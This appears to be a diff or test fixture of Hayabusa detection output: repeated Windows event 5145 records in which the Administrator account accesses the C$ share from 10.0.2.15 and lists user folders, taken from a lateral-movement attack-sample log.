+2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:22.284 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: BGinfo | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\account$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
